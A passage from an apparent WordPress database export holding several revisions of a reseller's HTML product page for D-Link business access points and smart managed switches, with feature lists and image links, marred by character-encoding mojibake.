Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:32:01','2019-09-25 06:32:01','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3403,1,'2019-09-25 14:32:24','2019-09-25 06:32:24','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:32:24','2019-09-25 06:32:24','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3404,1,'2019-09-25 14:32:47','2019-09-25 06:32:47','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" 